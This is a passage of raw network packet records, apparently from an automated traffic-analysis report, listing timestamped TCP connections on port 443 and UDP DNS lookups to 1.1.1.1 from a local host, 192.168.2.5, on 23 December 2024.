                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.148793936 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.148817062 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.148854017 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.148906946 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.202240944 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.585894108 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.586095095 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.586168051 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.586395979 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.586513996 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.586595058 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.586769104 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.586786032 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.588218927 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.588236094 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.005639076 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.005904913 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.005917072 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.006917953 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.006989002 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.007342100 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.007405043 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.007719040 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.007729053 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.007751942 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.007765055 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.048069000 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.074007034 CET4435003794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.075092077 CET50037443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.075464964 CET50037443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.075470924 CET4435003794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.077162981 CET50037443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.077168941 CET4435003794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.193828106 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.194228888 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.194281101 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.197575092 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.197659016 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.198024988 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.198098898 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.198271990 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.198295116 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.198353052 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.198393106 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.248379946 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.446347952 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.446588039 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.446655989 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.447876930 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.447892904 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.632658005 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.632853031 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.632913113 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.633280039 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.633296013 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.633304119 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.633347034 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.986377954 CET4435003794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.986428022 CET4435003794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.986490011 CET50037443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.986498117 CET4435003794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.986612082 CET50037443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.986960888 CET50037443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:44.986974955 CET4435003794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:45.006484985 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:45.006541967 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:45.006618023 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:45.006835938 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:45.006855965 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.382690907 CET44349958172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.382771969 CET44349958172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.382940054 CET49958443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.383738995 CET44349957172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.383805037 CET44349957172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.383904934 CET49957443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.410851955 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.410919905 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.411331892 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.411345959 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.412954092 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.412961960 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.444344044 CET44349960172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.444405079 CET44349960172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.444574118 CET49960443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.447654963 CET44349959172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.447792053 CET44349959172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:46.447891951 CET49959443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.197782040 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.197860003 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.197860003 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.197906017 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.198705912 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.198728085 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.276096106 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.276170015 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.276175022 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.276232958 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.277091026 CET50044443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:47.277116060 CET4435004494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.087882996 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.087924957 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.088001966 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.088191032 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.088205099 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.502295017 CET49960443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.502315044 CET44349960172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.502360106 CET49959443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:48.502396107 CET44349959172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.483932972 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.484030962 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.487196922 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.487227917 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489367008 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489384890 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489514112 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489547968 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489670038 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489706039 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489844084 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489886045 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.489994049 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:49.490014076 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137335062 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137423992 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137455940 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137484074 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137739897 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.137754917 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.214982033 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.215028048 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.215105057 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.215332031 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:51.215346098 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.619065046 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.619149923 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.619600058 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.619628906 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.621496916 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:52.621512890 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532438040 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532510996 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532515049 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532556057 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532748938 CET50067443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.532764912 CET4435006794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.533999920 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.534033060 CET4435007694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.534248114 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.534508944 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:53.534519911 CET4435007694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.369116068 CET4434998023.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.369227886 CET4434998023.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.369534969 CET49980443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.381736994 CET4434997923.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.381913900 CET4434997923.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.381982088 CET49979443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.934130907 CET4435007694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.934202909 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.934873104 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.934884071 CET4435007694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.937530994 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:54.937545061 CET4435007694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.329917908 CET49979443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.329977036 CET4434997923.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.329992056 CET49980443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.330020905 CET4434998023.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.828794003 CET4435007694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.828876972 CET4435007694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.828919888 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.828943968 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.829159975 CET50076443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:55.829174042 CET4435007694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:57.972145081 CET4435001123.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:57.972255945 CET4435001123.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:57.972373962 CET50011443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:57.972765923 CET4435001023.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:57.972954988 CET4435001023.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:57.973016977 CET50010443192.168.2.523.219.82.75

                                                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:13.133224010 CET5993153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:13.356106043 CET53599311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:38.226248026 CET5473853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:38.365381002 CET53547381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.335803986 CET5713653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.481794119 CET53571361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.654738903 CET53652021.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.772780895 CET53499971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.778043985 CET6518153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.778204918 CET5211753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.918572903 CET53651811.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.918586016 CET53521171.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:58.914398909 CET53640421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:00.288295031 CET53592751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:02.434616089 CET53572111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.016138077 CET5624953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.016525030 CET5224053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.154135942 CET53522401.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:25.719722986 CET5862653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:25.720711946 CET5064453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.189282894 CET5902053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.189515114 CET6510853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.190294981 CET5218853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.190691948 CET5013653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.190999985 CET6229553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.191361904 CET5447553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.219543934 CET5895953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.219927073 CET5338253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.326818943 CET53651081.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.326834917 CET53590201.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327197075 CET53521881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327771902 CET53622951.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328094006 CET53501361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328370094 CET53544751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.356688976 CET53589591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.356805086 CET53533821.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.099169970 CET5959253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.099387884 CET4983653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.102222919 CET5958253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.102442980 CET6024953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.237083912 CET53498361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.238471031 CET5879253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.238612890 CET5874953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.240570068 CET53595921.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.375528097 CET53587491.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.383244038 CET5162153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.383373022 CET6265353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.520572901 CET53626531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.120682955 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.367846012 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.426676989 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.669544935 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.027396917 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.206743002 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.206970930 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.206984043 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.206994057 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.207932949 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.209191084 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.211302996 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.270286083 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.356220007 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.452986002 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.453049898 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.453093052 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.453243017 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.453790903 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.455095053 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.456976891 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.462677956 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.468767881 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.524230957 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.524291039 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.524322033 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.524349928 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.526829004 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.528791904 CET44354586172.64.41.3192.168.2.5
